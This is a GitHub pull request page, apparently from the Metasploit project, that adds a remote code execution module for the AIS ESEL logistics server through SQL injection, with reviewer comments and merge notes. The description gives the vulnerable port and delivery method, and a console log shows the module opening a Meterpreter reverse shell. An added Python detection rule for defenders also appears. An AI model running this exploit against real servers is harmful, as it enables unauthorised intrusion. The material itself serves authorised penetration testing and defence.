
Add an RCE exploit for the AIS logistics software #11641

Merged
merged 24 commits into from Apr 29, 2019

@p0w1
Contributor

commented Mar 27, 2019

Add an RCE exploit for the AIS logistics software (www.ais.de). It exploits a SQL injection on the backend of their mobile app.

This module will execute an arbitrary payload on an "ESEL" server used by the
AIS logistic software. The server typically listens on port 5099 without TLS.
There could also be a server listening on 5100 with TLS, but the port 5099 is
usually always open.
The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
with the sa user is in place.

This module was verified on version 67 but it should also run on lower versions.
A fixed version was created by AIS in September 2017. However, most systems
have not been updated.

In regard to the payload, unless there is a closed port in the web server,
you don't want to use any bind payload. You want a "reverse" payload,
probably to your port 80 or to any other outbound port allowed on the firewall.

Currently, one delivery method is supported.

This method takes advantage of the Command Stager subsystem. This allows using
various techniques, such as using a TFTP server, to send the executable. By default
the Command Stager uses 'wscript.exe' to generate the executable on the target.

NOTE: This module will leave a payload executable on the target system when the
attack is finished.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/misc/ais_esel_server_rce
  • set RHOSTS <IP>
  • check
  • Verify "Server is vulnerable"
  • run
  • Verify Session opened

Scenarios

msf5 > use exploit/windows/misc/ais_esel_server_rce
msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
rhosts => 10.66.75.212
msf5 exploit(windows/misc/ais_esel_server_rce) > check
[+] 10.66.75.212:5099 - The target is vulnerable.
msf5 exploit(windows/misc/ais_esel_server_rce) > run

[*] Started reverse TCP handler on 10.66.75.208:4444
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[*] 10.66.75.212:5099 - Command Stager progress -   1.47% done (1499/102292 bytes)
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[*] 10.66.75.212:5099 - Command Stager progress -   2.93% done (2998/102292 bytes)
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
...
[*] 10.66.75.212:5099 - Command Stager progress -  99.55% done (101827/102292 bytes)
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[*] Sending stage (179779 bytes) to 10.66.75.212
[*] 10.66.75.212:5099 - Command Stager progress - 100.00% done (102292/102292 bytes)
[!] 10.66.75.212:5099 - The payload is left on the client in the %TEMP% Folder of the corresponding user.
[*] 10.66.75.212:5099 - Stager should now be executed. Waiting for 20 seconds..
[*] Meterpreter session 1 opened (10.66.75.208:4444 -> 10.66.75.212:57107) at 2019-03-27 11:04:29 +0100

meterpreter > getuid
Server username: NT Service\MSSQL$AIS
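As an added defender-side example (not code from this PR or from the Metasploit module), the following Python rule flags the endpoint footprint the description above implies: the SQL Server service account (assumed here to be `NT Service\MSSQL$AIS`, as in the getuid output) launching wscript.exe or another script host, or running an executable out of a Temp directory, where the Command Stager leaves its payload. The log format and the events are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Script hosts and shells that the SQL Server service account has no routine
# reason to launch; wscript.exe is the one the Command Stager uses by default.
SUSPICIOUS_IMAGES = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe"}
# Assumption: the MSSQL instance runs under a per-instance virtual account such
# as 'NT Service\MSSQL$AIS' (the account seen in the getuid output above).
MSSQL_SERVICE_ACCOUNT_RE = re.compile(r"^NT Service\\MSSQL\$", re.IGNORECASE)
# The module reports that the payload is left in the %TEMP% folder.
TEMP_DIR_RE = re.compile(r"\\temp\\", re.IGNORECASE)


@dataclass
class ProcEvent:
    user: str
    image: str
    parent_image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'Key=Value|Key=Value' process-creation line."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return ProcEvent(fields["User"], fields["Image"],
                     fields["ParentImage"], fields["CommandLine"])


def is_suspicious(ev: ProcEvent) -> bool:
    """True when the SQL service account spawns a script host or shell, or
    runs an executable out of a Temp directory."""
    if not MSSQL_SERVICE_ACCOUNT_RE.match(ev.user):
        return False
    image_name = ev.image.rsplit("\\", 1)[-1].lower()
    return image_name in SUSPICIOUS_IMAGES or bool(TEMP_DIR_RE.search(ev.image))


def find_alerts(lines):
    """Return the parsed events that match the rule, in log order."""
    return [ev for ev in map(parse_event, lines) if is_suspicious(ev)]


# Constructed sample events (not real captures). Only the 1st and 4th should fire:
# the 2nd is the SQL service itself starting, the 3rd is an interactive user.
SAMPLE_LOG = [
    r"User=NT Service\MSSQL$AIS|Image=C:\Windows\System32\wscript.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=wscript.exe C:\Windows\Temp\stage.vbs",
    r"User=NT Service\MSSQL$AIS|Image=C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe|ParentImage=C:\Windows\System32\services.exe|CommandLine=sqlservr.exe -sAIS",
    r"User=CORP\alice|Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=cmd.exe",
    r"User=NT Service\MSSQL$AIS|Image=C:\Windows\Temp\payload.exe|ParentImage=C:\Windows\System32\wscript.exe|CommandLine=payload.exe",
]

if __name__ == "__main__":
    for ev in find_alerts(SAMPLE_LOG):
        print(f"ALERT user={ev.user} image={ev.image} parent={ev.parent_image}")
```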

@p0w1 p0w1 changed the title Ais Add an RCE exploit for the AIS logistics software Mar 27, 2019

p0w1 added some commits Mar 27, 2019

@p0w1

Contributor Author

commented Mar 27, 2019

Thanks for the fast feedback. I added all the suggested changes.

@bcoles

Contributor

commented Mar 27, 2019

At some stage during the review process, the reviewer will request documentation for this module.

p0w1 added some commits Mar 28, 2019

@p0w1

Contributor Author

commented Apr 1, 2019

Do you need anything else?

@jrobles-r7

Contributor

commented Apr 11, 2019

Please add module documentation.
I didn't see a link for the software. Is there a download link for the software to test the module?

p0w1 added some commits Apr 25, 2019

@p0w1

Contributor Author

commented Apr 25, 2019

> Please add module documentation.
> I didn't see a link for the software. Is there a download link for the software to test the module?

You cannot download the software. It is not publicly available and I cannot provide you with an instance to test the exploit. I can send you a Wireshark dump if you want.

@jrobles-r7

Contributor

commented Apr 25, 2019

I suggested a few more changes to the module.

You can send a PCAP to msfdev [at] metasploit.com so we can verify the module works.

jrobles-r7 and others added some commits Apr 25, 2019

Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>

@jrobles-r7 jrobles-r7 added docs and removed needs-docs labels Apr 26, 2019

@jrobles-r7 jrobles-r7 self-assigned this Apr 26, 2019

@jrobles-r7 jrobles-r7 merged commit f63a2a6 into rapid7:master Apr 29, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed

jrobles-r7 added a commit that referenced this pull request Apr 29, 2019

msjenkins-r7 added a commit that referenced this pull request Apr 29, 2019

@jrobles-r7

Contributor

commented Apr 29, 2019

Release Notes

The windows/misc/ais_esel_server_rce exploit module has been added to the framework. This module exploits an unauthenticated SQL injection in AIS ESEL-Server to execute commands on the server.
